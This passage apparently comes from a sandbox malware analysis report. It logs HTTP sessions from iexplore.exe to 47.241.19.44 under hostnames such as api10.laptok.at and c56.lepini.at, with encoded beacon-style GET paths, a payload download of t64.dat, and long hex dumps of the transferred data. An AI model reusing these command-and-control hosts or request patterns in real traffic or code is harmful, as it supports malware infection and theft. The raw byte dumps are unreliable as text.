6a d4 e7 39 54 2d 39 e4 34 38 b6 c4 7d ad cc c2 bd 3d 4f e9 fb 37 38 de 54 b4 06 dd 93 b8 84 1e a5 7e d5 e4 82 80 69 48 37 f5 f8 78 3f 52 2c 8c b6 a5 4e 10 38 14 c2 8a 97 59 c7 0d 50 2a 11 92 ef f1 a6 e6 b5 b4 bb 56 9e 94 81 40 6b 90 56 48 ec f3 98 1b 6c a5 cc Data Ascii: 2000PE?ww2p&w9{Wn^uC:JoBek!c<\u/Q"Vd)UA ;h(s65cNS\|"!g\,7$}e:SuTm,JnZK:<igs]F=Lq-EE&N#M7 Y^Fa~Lw_o_F)mTb/s!+`o,20\ DxFDDS;#7N`Gvq wsT5[IKj1vT7#+qZvC}Tj=U@^M\|z(h"1r-YCo]+{a$kd@Mq&KhHVy78Ud&$apSNw\CNeoXD&!Yh5yFrZG.s &EDEBL.6RXgL"Jy<Tmkz#c.M/)'5::dVD-vC0>f[dFbi$6lVJbh.Q%jn[z%@~dMfQ"B}e$z<;E{3opF,L0\|.3@+2{V<o;5JHZbl\|QtfjC`_9-5~nJOxTf+1DIF"MgO;j9T-948}=O78T~iH7x?R,N8YPV@kVHl
Nov 23, 2020 16:11:53.885632038 CET	435	IN	Data Raw: 7c 7d c5 13 74 39 95 bc 95 24 84 f3 fb d2 46 be d8 81 4a 39 f1 6d e2 89 2b 49 db 40 da 67 4a be 91 fb 0d a8 80 76 fb e5 e7 64 7f 8f 08 33 ba 58 94 8b d2 92 00 a1 bc 8d 5c 29 6c cd a0 a7 8e 7b 54 bc fd bd 83 cf 26 93 1e c6 c6 6e e3 0b 11 11 f8 33 Data Ascii: \|}t9$FJ9m+I@gJvd3X\)l{T&n3+[c\|P=^D0tBWN!BOz1:[: T&H_6h A;X^#_^<("#%Ed42LpVw'\6_0
Nov 23, 2020 16:11:53.885662079 CET	436	IN	Data Raw: a4 65 62 12 fa c1 cc 94 b0 8f 1d ef 75 64 2c e7 16 e4 b0 21 0a eb 96 4f 36 29 bf a3 fa e5 7a fb ec 1c ab 24 74 f9 39 bb 23 15 79 c0 8a a5 b4 19 2c 4b e2 06 a8 59 fc fc 52 26 1c 19 4d 34 a6 ef f7 b6 71 61 e0 cb 66 52 12 f9 b6 c1 4d e0 35 67 be 4e Data Ascii: ebud,!O6)z$t9#y,KYR&M4qafRM5gN>!ik{8Q,Z4~S2uk0~d1@*:T&gjO;9h-}%5=3/3^!I{H}m1t:;5L=RV)Pf;
Nov 23, 2020 16:11:53.885691881 CET	438	IN	Data Raw: 41 6a b2 ed 1c 81 01 70 ef 09 60 b6 26 a5 81 95 8f 38 f9 30 0a e5 b4 7d 6b 31 25 2a fe 20 b0 e8 e8 5b 2e d2 c2 27 92 d9 a9 54 28 07 14 36 0f 82 a6 5c 6b 91 ee d9 ed 32 dd 35 e6 60 2a 81 88 9b de 0d 2d bb 1e 0e 7a fc 7d 2f cd 02 11 b4 df f9 9f 0d Data Ascii: Ajp`&80}k1%* [.'T(6\k25`-z}/\|mzwof~>MD"ZB}/Y=q5zkA'5b4VB+=oj,!.}7}t(XJbM!Cdg+%_Y2UqWJt%XgxU
Nov 23, 2020 16:11:53.885730028 CET	439	IN	Data Raw: ea 6c 7a 46 4b 82 43 81 b4 b6 da 0b 10 21 6b fe f4 98 11 3b 20 37 a8 49 18 f9 e6 18 7e a6 75 72 c8 b6 89 33 7f 40 74 18 62 71 05 ef 17 5a 19 82 e1 b3 e3 a2 67 46 54 41 7d 6a 16 62 2d 89 56 a2 3b 2c 5e 62 f1 c3 b6 d0 cc c1 b4 80 ab 02 91 d9 1e 9f Data Ascii: lzFKC!k; 7I~ur3@tbqZgFTA}jb-V;,^bw!/%:{}%G^2ipUH>/!^"SD)IZu4rm~sS[8\|zgSf;xctF-os`Vag3+e
Nov 23, 2020 16:11:53.885770082 CET	440	IN	Data Raw: 30 57 d1 d8 71 fa d6 d9 23 b7 a6 d5 6b 01 8b 3f 13 31 fd 16 73 9c c5 1f d2 c8 4e db 5b 20 6a c5 52 71 64 35 7a ba cd fb e8 dc 07 6c 17 d9 13 0f aa 0b ed 4d 9e 24 5d 9d 9c f9 db aa c5 32 ff 82 95 5c 2b cc 45 12 df 4c 3b 73 fb 93 d7 f8 cc 62 20 cf Data Ascii: 0Wq#k?1sN[ jRqd5zlM$]2\+EL;sb L<'6G.\|'@scu;A;uXBbU%AN.y,Y+OHLkET uJ&:9\|#e+M;7gypaD[
Nov 23, 2020 16:11:53.928219080 CET	442	IN	Data Raw: 27 44 78 2a 25 4a 3e 96 02 22 2b 82 1e ba 99 72 0a 5d 13 90 09 a0 30 fc d6 d7 48 22 a9 80 c0 3f c8 b3 2f a6 44 18 06 9d bf 05 17 53 ee 95 85 9c 2e 19 63 15 77 4b ed f5 32 76 0d 2c 26 43 d8 1a b1 1f a3 7e 57 1c ce f2 cf 20 9a 86 94 83 c5 88 97 ee Data Ascii: 'Dx*%J>"+r]0H"?/DS.cwK2v,&C~W 7^x[CW\|z%DYvM=B]NyxM&@jD']2%8i\|]a_{5^~sry6#YB0 t!SGt`H>-m#8b]d4
Nov 23, 2020 16:11:53.928286076 CET	443	IN	Data Raw: f1 44 9c e3 4b 94 7a 59 dc a9 85 66 5b 28 00 c3 8c a9 38 85 7a d7 d7 17 59 c3 97 bd bf ed 7c af e1 a2 e1 f4 ca 49 f5 2e d5 a9 93 84 a7 d0 23 f2 59 58 21 f5 78 f8 cf 66 e9 55 b4 ea 6e 6a ee ee 70 66 16 60 35 1e c1 51 69 80 06 41 86 58 d5 f4 43 7b Data Ascii: DKzYf[(8zY\|I.#YX!xfUnjpf`5QiAXC{h"Lz1I"*(/WoOGcSXF/Ue?@<~m.J+6\+AgX#mAd&R?i'6^-zn9!]\#NEx;b`V\|se{
Nov 23, 2020 16:11:53.928314924 CET	445	IN	Data Raw: 4c 78 2d cd fd 7d 94 f5 e8 e9 37 d8 a7 08 32 60 82 b3 a0 9a 86 e9 c3 ca 5a 1c 2c 34 8e 74 48 c8 10 2e 44 8b 02 1f fb 0e 24 56 c1 04 fb f6 2d e4 60 1d 83 de 88 7e 45 3a 9a 7a be b1 74 cc d1 c1 cf 68 ea 31 b6 13 34 4e 2e e0 96 d8 83 fa 98 cb d9 9f Data Ascii: Lx-}72`Z,4tH.D$V-`~E:zth14N.dz$x!bnl#`Z?N:~@XX\fCi:nj\|E:5cI01Dp;I1E WUU<pW:VOQa<CJb=nXC^
Nov 23, 2020 16:11:53.928344965 CET	446	IN	Data Raw: 23 c1 7e 83 08 93 91 1b fd cd 81 3f f4 25 55 7b d7 3b 5f 0b db f5 6d 18 f8 02 d4 0e c7 7e ed f8 35 ea 30 bc 80 02 b4 f4 0c 4b a5 ad b1 e9 15 7e be 9a 23 83 7f ca 9f d4 c5 66 ab 8a 83 59 2f 43 e2 19 60 03 35 6f 51 72 01 81 7b 19 af 81 23 80 ba b2 Data Ascii: #~?%U{;_m~50K~#fY/C`5oQr{#Zc{$r;v$Vt%B+6js u fV4VUzQ<h[lK}{xr-]P0K8 >[gA4H\|,7/_!
Nov 23, 2020 16:11:54.143841028 CET	447	IN	Data Raw: 60 cf fa 54 07 92 bb 73 56 1e f0 b1 18 6d 26 f1 44 99 e5 50 3d 43 a7 ba db 84 35 43 f5 84 46 85 e3 b6 fe bb a0 2a 69 e4 48 fd 7c 1c 2d 41 11 2c 4e 08 7f fe 21 b9 e2 97 f8 f9 89 f7 85 b3 8c 86 0f 82 fc be b1 97 8c d9 9a ce a1 ca 6c d6 05 46 d7 d3 Data Ascii: `TsVm&DP=C5CF*iH\|-A,N!lF(!&ZD%nCI+TU\|Zk&q}n+-;P"CIc]}w="4'^G7[wdlCHVkQBUwokc4XQ~(Gm

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49727	47.241.19.44	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Nov 23, 2020 16:11:56.129333973 CET	701	OUT	GET /favicon.ico HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: api10.laptok.at Connection: Keep-Alive
Nov 23, 2020 16:11:56.947292089 CET	710	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 23 Nov 2020 15:11:56 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.3	49731	47.241.19.44	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Nov 23, 2020 16:11:58.279874086 CET	728	OUT	GET /api1/3KeMhgiT8xV_/2FK897xWvJR/8iXi7QgKkQnFJA/vQvtuI7pl2axq2iQpRqfy/IcWdr95MWH_2FlIm/pxVwXYLRRjXX0iQ/Uu36CRnAWqyyANtvaC/GzBvnVm6z/2Vvse0Pv_2F2DgCjCiAr/HbSFwBUye9G83hlGQIE/ynlkRMDXeczvpYVDo2l1f2/u19mcvVVhmsQS/4qg7eRGS/y4iFh_2B2qVkDLa3nN1YMA_/2BF6h0vTAz/LS1BzJAVb8zBnnLnm/vKxwpRLQLhui/Ux_0A_0DFAv/2rNCEQzrqGRLrU/KP0aNmF_2FPI7PEUIWwdT/BT8ui2_2Bzid3re8/3_2BW_2BnNoX7CzUq5G/oI2 HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: api10.laptok.at Connection: Keep-Alive
Nov 23, 2020 16:11:59.182948112 CET	730	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Nov 2020 15:11:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Content-Encoding: gzip Data Raw: 37 33 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 15 93 45 b6 a4 50 00 43 17 c4 00 7d c8 10 77 77 66 b8 17 52 50 c8 ea fb f7 02 72 92 93 e4 0a 9f a5 f0 f9 03 cd 4b d3 90 be ac 60 e5 4f 17 64 55 6e 37 ea 19 51 a8 e5 e9 99 a2 c4 1f 56 1e 16 4e 3d 7b e0 ca 80 4a f5 47 b7 22 fb 31 a0 37 ba 9e 3d 3a 53 a0 15 63 50 ea 8b 52 79 3f 98 a9 9d 78 5c ef 52 d3 d3 ac bd 4b 09 d9 af a3 59 bd 52 a0 56 b9 f4 ea d9 19 b0 72 ab 29 66 97 af 34 55 cd 83 fd e5 69 48 11 50 f4 61 02 fa d5 c8 99 ca 08 0e 97 e2 5b 76 a8 53 57 0d b1 d1 10 ea 2b 33 1a ad 6b d8 a4 38 6d 66 c3 d7 5b fb f0 5b 3b 9e 9a ee 7c 00 3f 8c d1 ca 03 f6 e3 62 0d 97 c3 ef c4 28 2c 4d e6 7d c2 91 fa 59 d4 ce f4 bb a2 20 b1 bb 01 48 c7 e3 2c a0 50 bd 6a 86 2c cf ab 91 a9 43 b8 ec d4 95 75 0f c5 f7 47 92 dd 18 e3 a4 18 4d 17 09 f0 42 24 79 35 ae 51 d6 ad 17 59 61 ee f4 d0 22 de 12 46 d0 a0 43 97 e9 a9 59 fb 96 fa 55 e2 fb a8 fc 34 d9 c8 b6 9f 55 82 8e 64 27 6d 0a 0a 6c 28 b6 56 9b c3 06 41 ce 5f a6 dd 37 eb 47 81 04 a1 d5 2c fa 90 8a 87 7e a0 e5 c3 58 99 19 ee 9c ae bd f7 6b 38 da 5d 00 61 25 16 cb ed 12 22 79 51 ce 76 1b 9b 45 dc e5 17 0e cd db 1a 99 5f 35 02 cf f4 7c 14 7a 27 be 48 0f ce 4e 76 f1 9b 96 f1 83 91 aa ad 04 6a ae 2b b4 e6 3d f2 49 86 cf 7d 4f 63 30 d6 52 41 22 99 8b b8 42 44 05 20 58 ca 96 d2 ec d9 e7 99 11 81 64 e9 cc 39 2c da 10 f8 cb 79 98 ee 23 d4 07 fc 0d 70 c3 5b f7 eb 7f 70 25 68 ac e9 c2 3a 7f d3 e7 80 bc bd 46 b8 0a f1 da fe 81 ab 12 31 55 82 be 3e a2 fa 68 6b 76 81 3e 5c a7 d2 ee b6 11 c6 90 16 99 ca 6c 84 f3 84 b9 22 2a 9c d0 ba 13 6f f5 4b e7 de da da b1 56 88 31 60 3f f9 f6 45 7f 27 27 2c 11 88 b2 ae e8 2f 78 d3 66 26 c9 be 26 25 89 96 93 a9 5e 4f 18 84 05 e3 f0 96 dd 85 2b cb ae d7 f1 96 17 0c 27 c3 80 ca 1e 59 45 2d 0d ae f2 23 3a 4b 0e ba cd 14 3b 8f ba 83 d4 b3 2f 58 2b 8e 4f a5 92 1f c7 f8 e4 a8 79 c5 23 b8 5c 5b 02 91 d4 d3 59 d9 64 ea 26 9c 85 d2 b1 ed 9d 65 0f f2 15 d6 bc dd 18 25 cc 71 0c 25 cf 45 b3 a5 8f c4 3a 05 33 6e 03 d1 65 68 ff ae cc e6 87 ec 3d 31 08 03 fc ca 98 08 e5 1f 33 07 24 1d 37 51 98 b6 50 b9 10 a9 84 1f bb 95 52 10 3e ea 7a 13 c8 7e d2 1f 71 35 2f d4 62 2a 8f 1e 45 8b 9e b2 ca 66 b9 2a af 2d e9 51 e5 2b 49 6d 22 19 b3 ec 36 1e be be 78 1e 84 c0 4d 55 1f ab 44 aa cf 24 2e d9 f2 a4 cc cc 53 0b 1f 5c 45 ec 85 c9 6b 50 af 6a 3d 77 11 e3 8b f6 99 dc 0a 28 b2 11 ed 34 84 98 84 f4 11 23 df a6 90 f1 a8 62 c4 96 44 aa 26 0a 29 0a ae 21 3c d3 14 63 11 ca 8d 76 9b 21 05 29 66 e1 65 71 01 77 a2 b3 9f 41 ba 0c cd c2 c9 df 0f b2 50 99 44 07 2a 85 52 d8 a2 3f fc 19 3f 94 a7 45 77 0e d1 39 33 80 d1 8b ab 31 8b 48 43 a0 ad 72 7c 01 e8 11 7f 62 71 9c a5 e5 d5 93 83 be 50 ec 0c b3 64 ba 9d 90 72 82 e9 35 2b 74 d1 01 7c a1 87 6c f1 ba 8b 13 b3 78 82 8f 84 3e 22 b7 5c 0b 12 7a 7b aa 73 1c e9 cc a3 33 d3 ff 31 90 74 e2 83 cc 99 8e e8 3b 4a 6d c2 bc 31 fb 5d 19 54 d0 fa 23 6c b3 b7 b3 a8 de 86 e1 4b 23 b5 a2 c6 db 12 ec 77 fd 0f 5d 5d e7 62 0d 70 4e 37 df b3 4f 61 6d 36 10 e1 0d c6 c5 27 8e 10 4c 06 52 f1 99 a8 a0 eb 3b c2 36 ea 7e 99 79 b6 4e 1d d6 d1 cd e7 91 d6 51 ee 4e 2b 1b 30 8d b9 16 dc 4a e1 04 0f 78 28 e0 5e 3e 48 16 26 9b 8f c9 68 9a 59 af b8 88 5f ee 63 cc 8b 99 bc c3 6e 44 Data Ascii: 73bEPC}wwfRPrK`OdUn7QVN={JG"17=:ScPRy?x\RKYRVr)f4UiHPa[vSW+3k8mf[[;\|?b(,M}Y H,Pj,CuGMB$y5QYa"FCYU4Ud'ml(VA_7G,~Xk8]a%"yQvE_5\|z'HNvj+=I}Oc0RA"BD Xd9,y#p[p%h:F1U>hkv>\l"oKV1`?E'',/xf&&%^O+'YE-#:K;/X+Oy#\[Yd&e%q%E:3neh=13$7QPR>z~q5/bEf-Q+Im"6xMUD$.S\EkPj=w(4#bD&)!<cv!)feqwAPDR??Ew931HCr\|bqPdr5+t\|lx>"\z{s31t;Jm1]T#lK#w]]bpN7Oam6'LR;6~yNQN+0Jx(^>H&hY_cnD
Nov 23, 2020 16:11:59.182986021 CET	731	IN	Data Raw: 6a 3b 1f fb 34 23 d9 ce 3c 93 84 63 7b 58 ea db 1f 8c 29 b6 3b 2a 98 6d 3e b0 a9 bb 1f cc 5f e0 9f 4f c4 00 19 e6 4d cf 62 f4 b1 de 32 8a bf e9 a4 05 2b 88 fa 0a a7 64 cd 61 f9 83 8b 8e 54 09 b1 65 1d 7f 9f 6f 8d 4f 42 13 b4 d5 b6 44 5d 32 7e 33 Data Ascii: j;4#<c{X);m>_OMb2+daTeoOBD]2~3[QKx9?2o+Cl.8A!o>9nCAFiGEX<5@{%JY[$z>OwUm1q(HY,f!$?Ozb990{C

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.3	49746	47.241.19.44	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Nov 23, 2020 16:12:52.723073959 CET	5182	OUT	GET /jvassets/xI/t64.dat HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: c56.lepini.at
Nov 23, 2020 16:12:53.376138926 CET	5184	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Nov 2020 15:12:53 GMT Content-Type: application/octet-stream Content-Length: 138820 Last-Modified: Mon, 28 Oct 2019 09:43:42 GMT Connection: close ETag: "5db6b84e-21e44" Accept-Ranges: bytes Data Raw: 17 45 7e 72 ac 5b ed 66 e1 de 31 9e 70 18 b7 1a 77 c0 be b3 e2 43 ff 7c d8 16 7f 6f 35 a2 d1 a5 d2 ec 0d 0c de 58 84 1a f3 53 04 f0 65 cb 76 1f 35 85 a0 7d 1d f2 44 63 de 89 f3 f1 eb d3 60 21 68 3d 3a 93 e1 55 94 db 4c d2 f2 b4 3e 34 48 eb e8 47 7b 53 14 54 86 87 a3 d2 0d 55 0c d0 4f 6f 51 73 eb e2 f9 f4 9b f0 49 af 3d a0 bd ba 48 52 29 a2 84 33 75 9e 48 16 a7 b3 00 58 91 bf bf ea 49 85 ff c7 58 36 df 5b 13 ec c2 c6 92 56 72 82 53 68 a1 ca a8 33 3e e7 8b 8e 6f fa 4b 85 a0 7f bb 5c de 12 c3 97 40 27 18 f2 b2 95 91 d8 b7 45 cf 2a 5f 95 76 5b fc 02 c1 9d d7 e5 7f ee ec f5 a0 52 7b 4d 4d ae da 70 b4 71 95 b6 39 2e 38 47 c0 ab 5e fe cf a1 6a 5c a5 3c 8f 1b 97 0a 2a 41 5f 6e 2e 85 b4 8e 24 d6 6a 1c cb 43 8c ca 75 7d 09 57 73 3c a2 b8 0b 18 00 21 c1 f5 fc e4 2b 04 14 51 c3 36 ea 80 55 0a 28 82 e4 56 51 91 99 bf 11 ae 36 06 cd 81 44 e0 ad db 69 d6 8e 24 28 ee 4c 0d 81 69 8b 96 c0 52 cd ed ec 31 e8 7f 08 d8 ff 0a 82 4d 1d fa a0 28 3c 3f 5f 53 cb 64 ea 5d 7c c7 f0 0f 28 71 5a f4 60 b7 7b f3 e1 19 5b 7b be d1 62 af ef 2f ad 3b 22 a8 03 e7 9f 3d e5 da ca 8b 1a 9c 2c fd 76 89 a9 f7 a5 7b 6a b4 47 62 bf 64 5d 54 26 01 9a 1d 3b b0 97 db c5 c1 dd 94 52 d0 b2 77 e0 f7 00 8d c1 99 02 69 f4 b2 87 b2 0c 68 b3 9d b6 e6 a6 9f 58 b0 52 f8 5e b5 ac 1e 36 41 bd bc f9 5d 3a 2b 5a 40 60 9a 48 c1 b3 4a df cc 81 65 53 4e e4 9a 80 8b dd 8f 43 eb 11 23 73 1b 1b c1 99 89 21 94 4c a5 84 c3 13 96 ad 5d 82 20 a4 a4 3b dd 1e 43 74 c6 42 11 7a 8a f2 93 8b 7e 24 73 17 d9 c7 eb 47 18 47 41 4f a2 f1 bc 52 cc 35 f2 c2 73 3e e5 32 8a b5 c7 7c 3b d4 88 bd aa 47 48 66 2e 00 bd 3f fc 08 b4 49 98 e3 36 db f0 33 4c 40 2b cc 59 2a b5 ba 73 58 27 de a0 31 0e 6d 63 70 19 7b 5f 67 00 54 79 89 7f 42 21 df 6e 23 e1 54 43 4a 09 00 77 ac fb e4 2e a8 6d 07 21 b3 a0 98 ad 40 d2 34 64 c9 c2 62 14 7c 45 eb a0 65 98 c1 18 a1 6a af 69 0a a2 bb 50 42 96 c1 d7 02 58 6d f4 b1 15 90 f6 50 9c 6a fd d4 2e 5e a7 4a cb 67 59 63 74 77 99 de e0 c0 d5 5c 9d a7 89 1b 90 39 29 23 21 3b c4 35 f1 49 9e 67 f3 ce fe 1d 0a 67 69 06 13 13 30 ab e6 c6 f4 c9 7e 94 48 5b a1 f7 5f 27 1f 03 ac 85 e1 0e b1 bf 6e e1 1c 5a 24 cc b2 53 fd 61 58 e3 87 0b 85 9e 03 94 f6 2a bd 92 53 09 77 f8 5e d3 c9 b7 19 42 4e e6 2a 67 af 27 4e 01 de 6a fc 1e 82 0c 7e 45 7b e8 1d 97 82 9b 5c 14 96 d2 82 dd 53 15 1e 84 41 01 4f 0f 32 ac ee b7 85 96 4c e9 dc b0 42 3c 93 a6 0b a3 79 cb 7b 2c d1 21 6f c1 6a 38 48 d7 37 8f 35 b8 1d 7a e7 eb 63 bc 4e 6b b6 23 aa 9c fd 32 03 46 e2 37 47 49 c2 35 a1 48 7e 98 49 6a b4 98 e7 cb 33 dd 1a be 5a c8 ea a7 44 33 9b e3 a6 84 da 68 ec bf 93 03 88 f9 6e 02 17 a6 96 46 ad ae 25 c2 bb 97 7a 57 35 aa 0a 42 b5 c3 8a 35 af 20 1b 1a b9 c6 99 99 8a b2 b6 46 1c 70 a0 53 c2 e9 a2 e6 ad a4 8f d5 11 da 74 60 13 7c 55 4d 42 1c c6 a4 47 a8 4e 27 67 a4 37 b3 0e ca f5 b1 9a a5 de e3 07 25 55 07 ff 18 b3 17 44 8b a0 af e3 f5 ff 75 b8 f2 2b 4d 9e f9 ad 07 c0 5e d7 1b ab 81 e4 99 93 ac a9 63 2f 4e 27 18 d0 dd 29 f7 28 98 b1 c3 5e 52 9e d4 01 1b 9f ba 6d 7d 24 b8 cc 84 0e 03 07 2e 3a ba b5 ad 8b ae 57 ce 78 7b aa 0f 07 5f ee 2a 4a 6b 0d f8 40 bb 79 91 71 5d ae 1b 1d 3c bf b9 e2 9b d4 4c 6c 52 55 e3 59 22 40 9a 6f cc 9a 14 bb 63 ad 00 8f bf cd 7b ca 18 ce c6 df 21 08 86 ed 93 17 79 b7 6d 89 0c ba 64 8a 93 dd fa 1b 07 69 84 31 87 f9 ae 59 a4 f8 ed 03 62 6f 2a fa 54 99 38 81 d4 e3 dc e8 39 d4 b0 62 81 c2 49 a1 Data Ascii: E~r[f1pwC\|o5XSev5}Dc`!h=:UL>4HG{STUOoQsI=HR)3uHXIX6[VrSh3>oK\@'E_v[R{MMpq9.8G^j\<A_n.$jCu}Ws<!+Q6U(VQ6Di$(LiR1M(<?_Sd]\|(qZ`{[{b/;"=,v{jGbd]T&;RwihXR^6A]:+Z@`HJeSNC#s!L] ;CtBz~$sGGAOR5s>2\|;GHf.?I63L@+YsX'1mcp{_gTyB!n#TCJw.m!@4db\|EejiPBXmPj.^JgYctw\9)#!;5Iggi0~H[_'nZ$SaXSw^BNg'Nj~E{\SAO2LB<y{,!oj8H75zcNk#2F7GI5H~Ij3ZD3hnF%zW5B5 FpSt`\|UMBGN'g7%UDu+M^c/N')(^Rm}$.:Wx{_Jk@yq]<LlRUY"@oc{!ymdi1Ybo*T89bI
Nov 23, 2020 16:12:53.376161098 CET	5185	IN	Data Raw: eb f5 88 ab ff 3f 0c 75 18 1b 1d 91 15 83 a6 fd 8b ee e5 bd 0f 48 82 1c 3d 58 61 f7 66 26 f2 73 9c 5e a2 cd 4a 40 a8 52 cb 15 b9 9e 3b df e8 48 53 c5 31 f7 99 29 1a aa 5a 45 ff 53 fe d6 ce f8 d1 52 76 db d2 1d 04 1c 72 03 24 24 ea d3 f6 ed 0b a8 Data Ascii: ?uH=Xaf&s^J@R;HS1)ZESRvr$$tfK[78IZJw5nJX($B~"2"LZ YVBR6e?]<3Cb RaG;d6{(1#SVJ8\|ymf&ASxYE6*Vfy
Nov 23, 2020 16:12:53.376179934 CET	5187	IN	Data Raw: 17 e6 e3 36 d0 98 48 92 d6 8c 71 5d 6d 0c b5 89 7b f0 f8 2b 38 6c 87 33 a0 26 18 6c 19 1f b4 dd 6d a8 59 82 27 0f f4 73 73 5a 2b f2 0d 90 05 8d a8 2e f6 c3 62 40 2a 1e 51 7b e4 87 c8 26 68 a9 73 36 f0 f9 2e 79 3b b2 24 df 00 53 a1 ef 92 9a 6c d1 Data Ascii: 6Hq]m{+8l3&lmY'ssZ+.b@*Q{&hs6.y;$SlTNI#1<:'vKS;<x{vYJ0y4oO6,)\|S}P{ZL)%;eG`>yBTpCq`^7BW@O5Y-xkB6L=}
Nov 23, 2020 16:12:53.376200914 CET	5188	IN	Data Raw: e3 dd 38 4b 8e 73 21 eb 8f 06 22 3f 26 6d fe dd 16 d9 84 d9 6d 75 bd aa 6a 7a c4 48 d5 a0 29 cf 64 c2 d0 8a e9 59 26 44 95 5e c8 f4 ee 3e 75 fa f2 90 83 4f b0 03 03 da 2b a5 bf 28 4d 6a 66 36 57 4e 20 38 25 31 09 83 27 80 93 bc 6d ab 43 d9 f3 23 Data Ascii: 8Ks!"?&mmujzH)dY&D^>uO+(Mjf6WN 8%1'mC#U(SLNqv#<[Nf@"Cs \<v=*e7>mh-k\=2@NCzQ"45_sqd,g}]XdQ4TG:`phV-:t=(
Nov 23, 2020 16:12:53.376216888 CET	5189	IN	Data Raw: 96 b4 a8 52 0a 3c cc 5a a8 f6 3d 04 3b 66 9c 68 c0 67 fe ae 92 b8 bb a4 47 48 ec 76 69 69 fe ef 78 5d c3 36 e3 20 41 a3 97 30 c7 15 95 e7 56 6a 89 1f c9 09 d7 97 64 b5 c3 71 95 4b 7f 59 46 03 01 7a 66 6f ae 00 3b 4b e1 d6 3a 1b dd 21 33 78 24 d4 Data Ascii: R<Z=;fhgGHviix]6 A0VjdqKYFzfo;K:!3x$ [OVi<dnDPVv>?(UVnR)$K\,7/@sW+ue(EDe*[Mz{Uial'er^r
Nov 23, 2020 16:12:53.376233101 CET	5191	IN	Data Raw: 8d ca df 11 4f fc 21 25 23 28 d3 8c 54 2b e3 24 ac d8 5f f6 d7 0b 62 74 a2 8c 3a 67 20 ba 28 47 5a 5a 33 e8 16 02 dc 03 3f 52 a8 c0 8d 10 e2 05 5b 66 18 c7 ed 24 1e 6b c5 34 e1 94 1d 95 1d b6 33 62 b1 4f 49 9e 51 82 f1 4f 44 09 41 39 a8 3b 77 63 Data Ascii: O!%#(T+$_bt:g (GZZ3?R[f$k43bOIQODA9;wcHSpd7cQ5@'UFi!S$Z&lcFa<(: #vP\|@!cPkn6A{!dQ${Z+1Q&=HL:Ny21W
Nov 23, 2020 16:12:53.376247883 CET	5192	IN	Data Raw: 09 2f f0 20 e4 26 5b cb d4 cc e5 52 cf db 61 6b 2d 47 ec 69 dd 5e 31 72 29 9d d5 ac fa 55 ae 1b 0d 3c dc 64 67 32 b2 a3 85 c1 e3 48 e0 86 49 8c 9b 60 74 e9 51 c1 19 c6 2b 6d f5 4a 64 2e 07 6a 5e 53 1f 1f 3b ed 0a 0b ce 79 2f 2f 0e 2d 7a c0 6e e1 Data Ascii: / &[Rak-Gi^1r)U<dg2HI`tQ+mJd.j^S;y//-zn5.XR+_6}p{U[%(:]'F9~1me$QaV$;@F/Bs7EO@m+hb0I2qWje6'
Nov 23, 2020 16:12:53.376262903 CET	5194	IN	Data Raw: 7a a1 92 c2 66 9c fa 7f 43 4f 25 10 46 b1 e3 4e ee 61 73 a5 d5 db 2e dd 5d a0 6d f0 3a 12 00 0d a1 64 a0 22 6e ab 5f a2 db 1e f6 88 12 b9 8b 06 29 43 bf a4 21 7e ad 39 3f 44 c0 00 28 bf d4 9c bb 13 10 82 96 aa df 27 b6 2f a2 1d d4 73 54 39 ee 77 Data Ascii: zfCO%FNas.]m:d"n_)C!~9?D('/sT9wQ+V(FIA}DxQ8tl5m[Zo(82]UD0yoSv\:^E'f)kHuX#_.)Yg-FzNZVt?YI{sVL
Nov 23, 2020 16:12:53.376277924 CET	5195	IN	Data Raw: 5e 50 5f 4c e5 c6 31 9a 88 82 ec 6c d8 60 3e fa 75 dd 91 ad 70 ca dc 5f 9b 60 14 dd a7 fe b2 d7 4f f1 c4 60 d2 be 52 f7 0a f8 06 bd 43 ac 27 32 e1 2a b7 25 05 15 9c d6 09 5b 54 6a ae d6 30 23 2a bc ef 40 c4 c3 4a d9 ed 04 7c 6f 42 02 12 cb 05 ed Data Ascii: ^P_L1l`>up_`O`RC'2%[Tj0#@J\|oB+%lZiA-)D}ubR$%5EgDI?'f*=^8[szVr4Y'/4+{D8y^)/}Faf%#Dcn~l;+XmjUgmF}xxKHt
